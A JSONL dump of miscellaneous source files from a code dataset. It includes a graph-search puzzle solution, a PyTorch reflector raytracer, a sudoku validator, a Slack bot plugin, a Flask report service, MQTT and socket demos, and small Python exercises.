= queue.popleft()\n for nx in arr[x]:\n if visit[nx] == -1:\n visit[nx] = cnt + 1\n queue.append((nx, cnt + 1))\n \n return sum(visit)\n \n\nn, m = map(int, input().split())\narr = [[] for _ in range(n)]\nanswer = 99999\nidx = -1\n\nfor i in range(m):\n a, b = map(int, input().split())\n arr[a - 1].append(b - 1)\n arr[b - 1].append(a - 1)\n\nfor i in range(n):\n tmp = bfs(i)\n if answer > tmp:\n idx = i + 1\n answer = tmp\n\nprint(idx)","sub_path":"BOJ/BOJ Python/PY1389_케빈_베이컨의_6단계_법칙.py","file_name":"PY1389_케빈_베이컨의_6단계_법칙.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"219619972","text":"import torch\nfrom .reflector_utils import compute_reflector, compute_reflector_normals\nfrom ..reflector import interpolate_potentials\nfrom .utils import *\nfrom .reflection_laws import specular_reflection\nfrom math import pi\n\nclass BackwardRaytracer:\n def __init__(self, source_description, ray_weighter, source_spatial_discretization, source_angular_support, reflector_height):\n self.source_definition = source_description\n self.ray_weighter = ray_weighter\n self.source = source_spatial_discretization\n self.source_angular_support = source_angular_support\n self.reflector_height = reflector_height\n\n def __str__(self):\n return f\"BackwardRaytracer(reflector_height = {self.reflector_height}, ray_weighter = {self.ray_weighter})\"\n\n def raytrace_reflector(self, \n sinkhorn_result):\n self.source_angular_support.requires_grad_(True)\n potential = interpolate_potentials(sinkhorn_result, self.source_angular_support) - interpolate_potentials(sinkhorn_result, torch.Tensor([[pi/2]]).to(self.source_angular_support.device)) + torch.log(torch.Tensor([self.reflector_height])).to(self.source_angular_support.device)\n potential_gradients = torch.autograd.grad(potential,\n self.source_angular_support,\n grad_outputs=torch.ones_like(potential).to(potential.device),\n create_graph=True,\n retain_graph=True)[0]\n potential = potential.view(-1)\n potential_gradients = potential_gradients.view(-1)\n reflectors = compute_reflector(to_unit_vector(self.source_angular_support.view(-1)), potential).view(1, -1, 2)\n\n incident_rays = reflectors[:, :, None, :] - self.source[None, None, :, :]\n incident_rays 
= normalize_vector(incident_rays)\n\n        normals = compute_reflector_normals(to_unit_vector(self.source_angular_support.view(-1)), potential, potential_gradients)\n        normals = normalize_vector(normals)\n\n        reflected_rays = specular_reflection(incident_rays, normals[None, :, None, :])\n\n        rays_weights = self.ray_weighter.compute_weights(incident_rays)\n\n        return reflected_rays, rays_weights\n","sub_path":"reflector_problem/refl2d/raytracing/backward_raytracer.py","file_name":"backward_raytracer.py","file_ext":"py","file_size_in_byte":2327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"481275652","text":"\n\nclass Cellule:\n    def __init__(self, x, y, valeur, grille):\n        self.x = x\n        self.y = y\n        self.valeur = valeur\n        self.grille = grille\n\n    def is_valeur_valide(self, valeur):\n        to_return = self.is_colonne_valide(valeur) and self.is_ligne_valide(valeur) and self.is_block_valide(valeur)\n        print(to_return)\n        return to_return\n    \n    def is_colonne_valide(self, valeur):\n        for ligne in self.grille.model:\n            if ligne[self.x].valeur == valeur:\n                return False\n        return True\n    \n    def is_ligne_valide(self, valeur):\n        ligne = self.grille.model[self.y]\n        for cellule in ligne:\n            if cellule.valeur == valeur:\n                return False\n        return True\n\n    def get_block_coordinate(self):\n        return (self.x // 3 * 3), (self.y // 3 * 3)\n\n    def is_block_valide(self, valeur):\n        block_x, block_y = self.get_block_coordinate()\n        for i in range(block_y, block_y + 3):\n            for j in range(block_x, block_x + 3):\n                if self.grille.model[i][j].valeur == valeur:\n                    return False\n        return True","sub_path":"Cellule.py","file_name":"Cellule.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"592218558","text":"import time\nimport globalstatic\nfrom sftp_sync import sftp_local\nfrom sftp_sync import sftp_sftp\n\noutputs = []\ncrontabs = []\n\ntasks = {}\n\ndef process_message(data):\n    global tasks\n    channel = data[\"channel\"]\n    text = data[\"text\"]\n\n    def string_list(word_list,a_string):\n\n        for k in word_list:\n            if k in a_string:\n                return True\n        return False\n\n\n    if channel == globalstatic.main_channel:\n        if globalstatic.main_channel in text or channel == globalstatic.main_channel:\n\n            #tell time\n            key_words = globalstatic.command_key\n            if string_list(key_words,text):\n\n                key_words = [\"time\"]\n                if string_list(key_words, text):\n                    outputs.append([channel,\"The current time is \" + time.asctime( time.localtime(time.time()))])\n\n                key_words = [\"print\"]\n                if string_list(key_words, text):\n                    outputs.append([channel,\"I am printing\"])\n\n                key_words = [\"deploy\"]\n                if string_list(key_words, text):\n                    outputs.append([channel,\"I am performing synchronisation tasks....please wait\"])\n\n                    status, list = sftp_sftp.do_sync()\n\n                    if status:\n                        if len(list) > 0:\n\n                            outputs.append([channel,\"synchronisation complete, the following directories were successfully copied: \\n\" + '\\n'.join(list)])\n\n                        else:\n                            outputs.append([channel,\"synchronisation complete,no new directories were found\"])\n                    else:\n                        outputs.append([channel,\"synchronisation failed, please consult logs for more information\"])\n\n\n\n","sub_path":"plugins/commander.py","file_name":"commander.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"382037017","text":"'''\nRicky Cheah\nLab 6\n7/17/2020\n\nVarious assistive functions. 
\n'''\n\ndef bytePresentation(byte):\n    '''\n    This function takes in a byte, and returns the printable string form of the byte.\n    Aids in writing to output files. \n    '''\n    if byte == b'\\n': return \"\\\\n\"\n    if byte == b'\\r': return \"\\\\r\"\n    if byte == b'\\t': return \"\\\\t\"\n    \n    if byte >= b' ' and byte <= b'~':\n        return str(f\"'{byte.decode('utf-8')}'\")\n    else:\n        return f\"0x{byte.hex()}\"","sub_path":"csc255/Lab6_Cheah/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"465348452","text":"from flask import Flask, request, send_from_directory, make_response\r\nfrom utils.MyReport import create_pdf\r\nimport requests, json\r\nfrom flask import jsonify\r\n# timestamp\r\nfrom datetime import datetime\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef index():\r\n    return r\"Service example\"\r\n\r\n@app.route('/input', methods=['GET']) # add the /input route\r\ndef input():\r\n    # json_yq = request.args.get('data')\r\n    # print('Yunque JSON data', json_yq)\r\n    '''--- test data --'''\r\n    json_yq = '{\"BestTeams\":{\"content\":[\"121253\",\"发生的\"],\"date\":1542261532000,\"file\":9,\"name\":\"test\",\"time\":7,\"userid\":\"20411542261473232\"},\"Starfriends\":{\"content\":[{\"content\":\"阿道夫\",\"date\":1542607597000,\"type\":\"text\"},{\"content\":\"123132\",\"date\":1544770491000,\"type\":\"text\"},{\"content\":\"41\",\"date\":1543477116000,\"type\":\"text\"},{\"content\":\"明德慎罚\",\"date\":1542607595000,\"type\":\"text\"},{\"content\":\"克劳德萨弗兰克\",\"date\":1542607594000,\"type\":\"text\"},{\"content\":\"阿道夫\",\"date\":1542607597000,\"type\":\"text\"},{\"content\":\"你家里宽带覆盖到了分公司\",\"date\":1542607592000,\"type\":\"text\"},{\"content\":\"123132\",\"date\":1544770491000,\"type\":\"text\"},{\"content\":\"你家里宽带覆盖到了分公司\",\"date\":1542607592000,\"type\":\"text\"},{\"content\":\"41\",\"date\":1543477116000,\"type\":\"text\"},{\"content\":\"明德慎罚\",\"date\":1542607595000,\"type\":\"text\"},{\"content\":\"克劳德萨弗兰克\",\"date\":1542607594000,\"type\":\"text\"}],\"date\":\"2018-11-19\",\"file\":4,\"name\":\"设计师3\",\"time\":18,\"userid\":\"10000025600000\"}}'\r\n    data_yq = json.loads(json_yq)\r\n    '''--- star friend ---'''\r\n    friend_data = data_yq[\"Starfriends\"]\r\n    '''--- best team ---'''\r\n    team_data = data_yq[\"BestTeams\"]\r\n    '''--- discussion test data ---'''\r\n    content_words = '阿道夫 123132 41 明德慎罚 哈哈 克劳德萨弗兰克 234 9001 四个 四个 四个 四个 四个人 阿道夫 你家里宽带覆盖到了分公司 你家里宽带覆盖到了分公司 41 明德慎罚 克劳德萨弗兰克 哈哈哈 这就是 我跟你说' \\\r\n                    '这艘不是 这都不是谁 硬核 太给力了 开会 明天要集体讨论 嗯 设计模式 哈哈 就这样吧 统一 同意 领导找你 对 就是这个 我不是跟你熟 来一下室办 是这个 你有' \\\r\n                    '照片么 文档发我一下 啊哪儿跟啊 在哪里开会 我在研发楼等你 打印一下报告 明天交报告 嗯嗯 好的 恩恩恩恩呢 嗯嗯 好的好的' \\\r\n                    '让我来 这是我来做 云雀 云雀 云雀 云雀 用云雀传 不用云雀传 云雀还可以 你把资料传云雀上 呼叫领导上云雀 我觉得可以 收到' \\\r\n                    '吃饭 楼下 这就来 感觉可以 真棒 先这样试试 辛苦了 发邮件 发nas 上传 光盘 刻录机 刚觉是 那本控制院里 知值奥 直到控制 ' \\\r\n                    '导航制导 仿真技术 北京故将 北京仿真中心 什么专业 不易 毕业了么 书记 主任 副主任 组长 研究院 副科长 胜利 好的 就这么牛皮'\r\n    starttime = datetime.now()\r\n    file_name = create_pdf(\r\n        name='李爱国国', # user name\r\n        name_id=friend_data[\"userid\"], # user id √\r\n        head_image='./image/me.png', # avatar\r\n        key_words='硬核少年', # key words\r\n        user_data=[[2, 2, 1], [5, 6, 2], [3, 3, 1], [2, 3, 1], [6, 7, 2], [4, 8, 3]], # six ability scores\r\n        key_language='爱国敬业诚信友善富强民主文明和谐自由平等公', # evaluation text\r\n        value_data=[[1, 3], [20, 200], [31, 310], [90, 100]], # [my contribution, department contribution]\r\n        friend_name=friend_data[\"name\"], # friend name √\r\n        friend_date=friend_data[\"date\"], # first met √\r\n        friend_time=str(friend_data[\"time\"]), # discussion count √\r\n        friend_file=str(friend_data[\"file\"]), # files exchanged √\r\n        friend_content=content_words, # discussion content (friend) √ 
get_text_friend(data_yq)\r\n        team_date=str(team_data['date']), # created date √ currently int, ideally (str) '2018-11-11'\r\n        team_file=str(team_data['file']), # uploaded files √ int->str? convert here?\r\n        team_name=team_data['name'], # best speaker √\r\n        team_time=str(team_data['time']), # team size √ int->str? convert here?\r\n        team_content=get_text_team(team_data[\"content\"]) # discussion content (team) √ (str) \"121253\" \"发生的\"\r\n    )\r\n    print('[Report] PDF render time:', (datetime.now() - starttime))\r\n    '''--- return json object to Zhongge ---'''\r\n    rjson={}\r\n    rjson['answer'] = 'success'\r\n    rjson['data'] = file_name\r\n    return jsonify(rjson)\r\n\r\n@app.route(\"/download/<filename>\") # <parameter>\r\ndef download(filename):\r\n    response = make_response(send_from_directory('./static', filename, as_attachment=True))\r\n    response.headers[\"Content-Disposition\"] = \"attachment; filename={}\".format(filename.encode().decode('latin-1')) # filename works fine even with Chinese characters\r\n    return response\r\n\r\ndef get_text_friend(chart_string):\r\n    return \" \".join([i[\"content\"] for i in chart_string[\"Starfriends\"][\"content\"]])\r\ndef get_text_team(chart_string):\r\n    return \" \".join(i for i in chart_string)\r\n'''\r\na = json.loads(s)\r\nb = a[\"Starfriends\"][\"content\"]\r\nc = [i[\"content\"] for i in b]\r\n'''\r\n\r\nif __name__ == '__main__':\r\n    app.run(host='0.0.0.0', port=1028) # 10.12.97.23 ipconfig\r\n    # 0.0.0.0 listens on all interfaces\r\n    # http://localhost:1028/input?data=test\r\n\r\n'''\r\n    # if tool == 'CreatReport': # http://localhost:1028/input?data=CreatReport&user_id=111222199312091111\r\n    #     user_id = request.args.get('user_id')\r\n    #     r = requests.get('http://10.12.97.3:8083/interfaces/report/starfriends')\r\n    #     content_words = get_text(r.text)\r\n    # else:\r\n    #     return \"invalid auth token\"\r\n'''\r\n'''\r\n    # return f\"http://localhost:1028/download/{file_name}\"\r\n    # return f'download link'\r\n'''\r\n'''\r\n{\"knowledgeBehavior\":{\"knowledgeUploadCount\":9,\"knowledgeSharedCount\":4,\"knowledgeReadCount\":28}}\r\n'''\r\n\r\n# http://10.12.97.22:8006/giksp/count!getUserKB2018.action?formvalue=123456","sub_path":"API.py","file_name":"API.py","file_ext":"py","file_size_in_byte":6440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"456603101","text":"\"\"\"Exercise 05\n\nWrite a program that asks the user to enter the number of sales for the day. Record each sale separately, then show the average and the total value sold in the day.\n\"\"\"\n\nvendas_dia = []\ncont = int(input('How many sales did you make today? 
'))\n\nfor i in range(1, (cont + 1)):\n    vendas_dia.append(float(input(f'Enter sale {i}: ')))\n\nprint(f'Average sales: R$ {sum(vendas_dia) / cont } \\nTotal sales: R$ {sum(vendas_dia)}')","sub_path":"Exercicios/Aulas00/aula09/parte1/exercicio5.py","file_name":"exercicio5.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"518570971","text":"previousNumber = int(input()) # previous number\r\ncurrent = 1 # current sequence length\r\nmaximum = 1 # maximum sequence length\r\nwhile previousNumber != 0:\r\n    currentNumber = int(input()) # current number\r\n    if currentNumber == previousNumber:\r\n        if currentNumber == 0:\r\n            break\r\n        current += 1\r\n    else:\r\n        if current > maximum:\r\n            maximum = current\r\n        previousNumber = currentNumber\r\n        current = 1\r\nprint(maximum)\r\n","sub_path":"MaximumandMaximum.py","file_name":"MaximumandMaximum.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"443942816","text":"import threading\nimport socket\nimport select\nimport sys\n\ndef get_ip():\n    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n    try:\n        s.connect(('10.255.255.255', 1))\n        local_ip = s.getsockname()[0]\n    except:\n        local_ip = '127.0.0.1'\n    finally:\n        s.close()\n    return local_ip\n\ndef clientthread(conn, addr):\n    while True:\n        try:\n            message = conn.recv(65536)\n            if message:\n                print(\"<\" + addr[0] + \"> \" + message.decode('utf-8'))\n                conn.send(\"hello\".encode('utf-8'))\n                message2=conn.recv(65536)\n                print(message2.decode('utf-8'))\n                conn.send(\"got something new\".encode('utf-8'))\n            else:\n                return\n        except:\n            continue\n\nthreads = list()\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nIP_address = get_ip()\nPort = 10101\nserver.bind((IP_address, Port))\nserver.listen(100)\n\nwhile True:\n    conn, addr = server.accept()\n    x = threading.Thread(target=clientthread, args=(conn,addr))\n    threads.append(x)\n    x.start()\n\nconn.close()\nserver.close()\n","sub_path":"server3.py","file_name":"server3.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"577394744","text":"import re \r\nimport nltk\r\nfrom nltk.tokenize import word_tokenize\r\nimport sys\r\n\r\ndef cmaStopWord(text):\r\n\t\"\"\"To search and filter out stop words\"\"\"\r\n\t\r\ndef wOpenFile(filename):\r\n\tf = open('C:/Users/wkeil/Desktop/qafastamalti/qafasTaMalti/ilsien_sannaja/' + filename\r\n\t + '.txt', 'r')\r\n\ttext = f.read()\r\n\tf.close()\r\n\t# tokens = word_tokenize(text)\r\n\t# words = [w.lower() for w in tokens]\r\n\t# vocab = sorted(set(words))\r\n\t#text1 = text.split()\r\n\t#abstracts = nltk.Text(text1) #attach NLTK funcc\r\n\t# return set(vocab)\r\n\treturn text\r\n\r\ndef openfile():\r\n\t#takes the result from annotator and adds it to a file\r\n\tnameOfText = raw_input(\"Enter the name of the file to tag (no ext): \")\r\n\tdirectory = '//home/linguistlovepc/Documents/PythonProjects/maltese_nlp_app/kongugator_ta_feghel/qafasTaMalti/ilsien_sannaja/training_data/'\r\n\ttext = open(directory + nameOfText + '.txt','rU')\r\n\trtext = text.read()\r\n\ttokens = nltk.word_tokenize(rtext)\r\n\t#text = nltk.Text(tokens)\r\n\r\n\treturn text\r\n\r\ndef cmaPresVerb(text):\r\n\t\"\"\"To find possible present and progressive verbs\"\"\"\r\n\tallVerbs = 
[]\r\n\r\n\tmatches = re.findall(r'\\b\\spi[a-zA-Z]+|\\spk[a-zA-Z]+', text, re.I)\r\n\tfor match in matches:\r\n\t\tallVerbs.append(match)\r\n\treturn allVerbs\r\n\r\ndef cmaPronoun(text):\r\n\t\"\"\"To search for any pronouns in a CMA text\"\"\"\r\n\tpronouns = []\r\n\r\n\tmatches = re.findall(r'\\bana|\\sint|\\snaxni|\\sintou|\\sinti|\\sinnen|\\souo|\\sie', text, re.I)\r\n\tfor match in matches:\r\n\t\tpronouns.append(match)\r\n\treturn pronouns\r\n\r\ndef annotator(text):\r\n\tprocessedText = text.split()\r\n\tannotatedText = []\r\n\t\"\"\"annotator needs to tag the punc marks seperate from the words\"\"\"\r\n\r\n\t\"ask the user what p.o.s a word is, for every word in the text\"\r\n\tfor word in processedText:\r\n\t\tword_pos = raw_input(\"Insert the POS of the word \" + word + \": \")\r\n\t\tif word:\r\n\t\t\tannotatedText.append(word + \"/\" + word_pos)\r\n\t\t\r\n\tannotatedText = str(annotatedText)\r\n\tannotatedText = annotatedText.lower().encode('utf-8')\r\n\t#this needs to be joined before list conversion #annotatedText = list(annotatedText)\r\n\r\n\tnameOfFile = raw_input(\"Which file is this to be placed in? \")\r\n\r\n\tfilename = open('//home/linguistlovepc/Desktop/lingApps/qafasTaMalti/ilsien_sannaja/training_data/' + nameOfFile + '.txt','a')\r\n\tfilename.write(annotatedText)\r\n\r\n\tprint(filename)\r\n\treturn annotatedText\r\n\r\n\t\"take the input from the user and add a '/' between the pos and the word\"\r\n\r\n\t\"\"\"punctuation may be a problem, how to deal with seperating words from punctuation\r\n\tand tag them as a punc mark\"\"\"","sub_path":"sanna/training_data/sannaLingFunctions.py","file_name":"sannaLingFunctions.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"246538696","text":"class Student:\n def __init__(self, name):\n self.__name = name\n\n def set_name(self, name):\n self.__name = name\n\n def get_name(self):\n return self.__name\n\n def __step(self):\n print(\"%s make step.\" % self.__name)\n\n def going_home(self):\n self.__step()\n\n name = property(get_name, set_name)\n\n\nstudent = Student('Bob')\n\ntry:\n print(student.__name) # accessing a private attribute\nexcept AttributeError:\n print(\"\\t{}: name {}\".format(AttributeError.__name__, AttributeError.__doc__))\n\ntry:\n print(student.__step()) # accessing a private attribute\nexcept AttributeError:\n print(\"\\t{}: step() {}\".format(AttributeError.__name__, AttributeError.__doc__))\n\n\n# public method invocation --> all is OK\nstudent.going_home()\n# public method invocation --> all is OK\nstudent.set_name(\"Alice\")\nstudent.going_home()\n\n# accessing an attribute via its property object\nstudent.name = 'Mark'\nprint(student.name)","sub_path":"presentation/encapsulation.py","file_name":"encapsulation.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"356826415","text":"from app import app, db, models\nimport app.Scripts.ConnectionsValidation as conn\n\ndef IncrementConnections(trip_id):\n connections = models.Connection.query.filter().all()\n trip = models.Trip.query.filter(models.Trip.id == trip_id).first()\n if trip == None:\n print('ERROR: INVALID TRIP')\n return\n\n for connection in connections:\n person = connection.person\n\n if person == None:\n continue\n if person.attending == False:\n continue\n\n status, res = conn.GetMember(connection.chamber, connection.state, 
connection.district)\n member = res.first()\n\n if member == None:\n continue\n\n primary_meetings = models.Meeting.query.filter(models.Meeting.datetime != None, models.Meeting.member_id == member.id, models.Meeting.primary_id == person.id, models.Meeting.trip_id == trip_id)\n\n secondary_meetings = models.Meeting.query.filter(models.Meeting.datetime != None, models.Meeting.member_id == member.id, models.Meeting.secondary_id == person.id, models.Meeting.trip_id == trip_id)\n\n if len(primary_meetings.all()) == 1:\n meeting = primary_meetings.first()\n meeting_type = 'PRIMARY'\n\n elif len(secondary_meetings.all()) == 1:\n meeting = secondary_meetings.first()\n meeting_type = 'SECONDARY'\n\n else:\n continue\n\n old_visits = connection.visits\n if (old_visits > 0): continue\n\n connection.visits += 1\n new_visits = connection.visits\n\n print(person, member, meeting, meeting_type, 'visits: {}->{}'.format(old_visits, new_visits))\n\n db.session.commit()\n\ndef AddConnectionsFromPreviousVisits(trip_id):\n meetings = models.Meeting.query.filter(models.Meeting.datetime != None, models.Meeting.trip_id == trip_id).all()\n\n for meeting in meetings:\n primary = meeting.primary\n secondary = meeting.secondary\n member = meeting.member\n\n chamber = 'senate' if member.chamber_id==1 else 'house'\n state = member.state_code\n district = member.senate_class if chamber=='senate' else member.house_district\n\n # Get all connections primary/secondary-member connections\n primary_connections = models.Connection.query.filter(models.Connection.chamber==chamber, models.Connection.district==district, models.Connection.state==str(state), models.Connection.person_id==primary.id).all()\n\n if len(primary_connections) == 0:\n connection = models.Connection(chamber=chamber, district=district, state=state, person_id=primary.id, type=[u'NA'], visits=1)\n db.session.add(connection)\n print(member, primary, 'PRIMARY', len(primary_connections))\n\n if secondary != None:\n secondary_connections = models.Connection.query.filter(models.Connection.chamber==chamber, models.Connection.district==district, models.Connection.state==str(state), models.Connection.person_id==secondary.id).all()\n\n if len(secondary_connections) == 0:\n connection = models.Connection(chamber=chamber, district=district, state=state, person_id=secondary.id, type=[u'NA'], visits=1)\n db.session.add(connection)\n print(member, secondary, 'SECONDARY', len(secondary_connections))\n\n print('{} meetings total'.format(len(meetings)))\n db.session.commit()\n","sub_path":"app/Scripts/ConnectionsUtils.py","file_name":"ConnectionsUtils.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"154860926","text":"from abc import ABC, abstractmethod\nfrom contextlib import contextmanager\nfrom uuid import uuid4\n\nimport pytest\nfrom sqlalchemy import (\n delete,\n select,\n UniqueConstraint,\n)\n\n\nclass AbstractBaseTest(ABC):\n @pytest.fixture\n def cls_(self):\n \"\"\"\n Return class under test.\n Assumptions: if the class under test is Foo, then the class grouping\n the tests should be a subclass of BaseTest, named TestFoo.\n \"\"\"\n prefix = len(\"Test\")\n class_name = self.__class__.__name__[prefix:]\n return getattr(self.get_model(), class_name)\n\n @abstractmethod\n def get_model(self):\n pass\n\n\ndef dbcleanup_wrapper(session, obj, where_clause=None):\n with dbcleanup(session, obj, where_clause):\n yield obj\n\n\n@contextmanager\ndef dbcleanup(session, obj, 
where_clause=None):\n \"\"\"\n Use the session to store obj in database; delete from database on exit, bypassing the session.\n\n If obj does not have an id field, a SQLAlchemy WHERE clause should be provided to construct\n a custom select statement.\n \"\"\"\n return_id = where_clause is None\n\n try:\n obj_id = persist(session, obj, return_id)\n yield obj_id\n finally:\n table = obj.__table__\n if where_clause is None:\n where_clause = _get_default_where_clause(type(obj), obj_id)\n stmt = delete(table).where(where_clause)\n session.execute(stmt)\n\n\ndef persist(session, obj, return_id=True):\n \"\"\"\n Use the session to store obj in database, then remove obj from session,\n so that on a subsequent load from the database we get a clean instance.\n \"\"\"\n session.add(obj)\n session.flush()\n obj_id = obj.id if return_id else None # save this before obj is expunged\n session.expunge(obj)\n return obj_id\n\n\ndef delete_from_database(session, objects):\n \"\"\"\n Delete each object in objects from database.\n May be called at the end of a test if use of a context manager is impractical.\n (Assume all objects have the id field as their primary key.)\n \"\"\"\n # Ensure we have a list of objects (check for list explicitly: a model can be iterable)\n if not isinstance(objects, list):\n objects = [objects]\n\n for obj in objects:\n table = obj.__table__\n stmt = delete(table).where(table.c.id == obj.id)\n session.execute(stmt)\n\n\ndef get_stored_obj(session, cls, obj_id=None, where_clause=None, unique=False):\n # Either obj_id or where_clause must be provided, but not both\n assert bool(obj_id) ^ (where_clause is not None)\n if where_clause is None:\n where_clause = _get_default_where_clause(cls, obj_id)\n stmt = select(cls).where(where_clause)\n result = session.execute(stmt)\n # unique() is required if result contains joint eager loads against collections\n # https://gerrit.sqlalchemy.org/c/sqlalchemy/sqlalchemy/+/2253\n if unique:\n result = result.unique()\n return result.scalar_one()\n\n\ndef has_unique_constraint(table, fields):\n for constraint in table.constraints:\n if isinstance(constraint, UniqueConstraint):\n col_names = {c.name for c in constraint.columns}\n if set(fields) == col_names:\n return True\n\n\ndef has_index(table, fields):\n for index in table.indexes:\n col_names = {c.name for c in index.columns}\n if set(fields) == col_names:\n return True\n\n\ndef collection_consists_of_objects(collection, *objects):\n \"\"\"\n Returns True iff list(collection) == list(objects), where object equality is determined\n by primary key equality: object1.id == object2.id.\n \"\"\"\n if len(collection) != len(objects): # False if lengths are different\n return False\n if not collection: # True if both are empty\n return True\n\n # Sort, then compare each member by its 'id' attribute, which must be its primary key.\n collection.sort(key=lambda item: item.id)\n objects = list(objects) # type: ignore\n objects.sort(key=lambda item: item.id) # type: ignore\n\n for item1, item2 in zip(collection, objects):\n if item1.id is None or item2.id is None or item1.id != item2.id:\n return False\n return True\n\n\ndef get_unique_value():\n \"\"\"Generate unique values to accommodate unique constraints.\"\"\"\n return uuid4().hex\n\n\ndef _get_default_where_clause(cls, obj_id):\n where_clause = cls.__table__.c.id == obj_id\n return 
where_clause\n","sub_path":"test/unit/data/model/mapping/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":4440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"576444018","text":"#! /usr/bin/python3\n\nimport paho.mqtt.client as mqtt\nimport time\nimport json\n\nverbose = False\n\n\ndef on_log(client, userdata, level, buf):\n    print(\"log: \"+buf)\n\n\ndef on_connect(client, userdata, flags, rc):\n    if rc == 0:\n        print(\"connected OK\")\n    else:\n        print(\"Bad connection Returned code=\", rc)\n\n# on_message will get messages from the topics subscribed to\n\n\ndef on_message(client, userdata, msg):\n    topic = msg.topic\n    msgPayload = json.loads(msg.payload)\n    print(\"Topic: \", topic)\n    print(\"Message: \", msgPayload)\n\n\ndef on_disconnect(client, userdata, flags, rc=0):\n    print(\"Disconnected result code \"+str(rc))\n\n\nbroker = \"192.168.0.75\"\nclient = mqtt.Client(\"Broker_1\")\n\nclient.on_connect = on_connect\nif verbose:\n    client.on_log = on_log\nclient.on_message = on_message\nclient.on_disconnect = on_disconnect\n\nprint(\"Connecting to broker \", broker)\nclient.connect(broker)\n# Topics\ntopic_con = \"sensor_connection\"\ntopic_temp = \"sensor_temp\"\ntopic_fan = \"sensor_fan\"\ntopic_fan_state = \"fan_state\"\nclient.subscribe(topic_con)\nclient.subscribe(topic_temp)\nclient.subscribe(topic_fan)\nclient.subscribe(topic_fan_state)\nclient.subscribe(\"topic_test\")\nclient.loop_start()\ntime.sleep(10)\nclient.publish(\"topic_test\", json.dumps(\n    {\"Broker-1\": \"Broker-1 connected and going in the loop\"}))\n\nwhile 1:\n    time.sleep(30)\n    client.publish(\"topic_test\", json.dumps(\n        {\"broker_1\": \"Broker-1 in test loop 30 seconds\"}))\n\nclient.loop_stop()\nclient.disconnect()\n","sub_path":"broker/mqtt_test_broker.py","file_name":"mqtt_test_broker.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"557553465","text":"import matplotlib.pyplot as plt\nfrom matplotlib import *\nfrom numpy import *\nfrom matplotlib.animation import *\n\nname = \"Log Spiral\"\ndef shape(fig, edge_c, edge_w, grid, radiusm):\n\tplt.clf()\n\tdef r_(u):\n\t\tr = exp(a *u)\n\t\treturn r\n\n\ta = radiusm\n\tu = linspace(-5 *pi, pi,1000)\n\tr = r_(u)\n\n\tax = plt.subplot(111)\n\tax.projection='polar'\n\n\tax.patch.set_facecolor(\"black\")\n\tax.xaxis.set_tick_params(color=\"white\", labelcolor=\"white\")\n\tax.yaxis.set_tick_params(color=\"white\", labelcolor=\"white\")\n\n\tplt.axis(grid)\n\tplt.axis('equal')\n\n\tplt.plot(u, r, color=edge_c, linewidth=edge_w)\n","sub_path":"src/Current Models/Two Space/log_spiral.py","file_name":"log_spiral.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"467059788","text":"'''\nReverse a stack, using only recursive functions and the stack's own pop\noperation; no extra data structures may be allocated. Given an integer array A\nthat represents the stack, together with its size n, return the reversed stack.\nSample:\n[4,3,2,1],4\nreturns: [1,2,3,4]\n'''\nclass StackReverse:\n    def get_bottom_ele(self,A):\n        # fetch the bottom element of the stack\n        res = A.pop()\n        if len(A) == 0:\n            return res\n        else:\n            last = self.get_bottom_ele(A)\n            A.append(res)\n            return last\n\n    def reverseStack(self, A, n):\n        # write code here\n        if len(A) == 0:\n            return\n        else:\n            ele = self.get_bottom_ele(A)\n            self.reverseStack(A, len(A))\n            A.append(ele)\n            return A\n\n\nif __name__ == '__main__':\n    A = [3,2,1]\n    
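# with index 0 as the stack bottom, [3,2,1] comes back as [1, 2, 3]\n    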
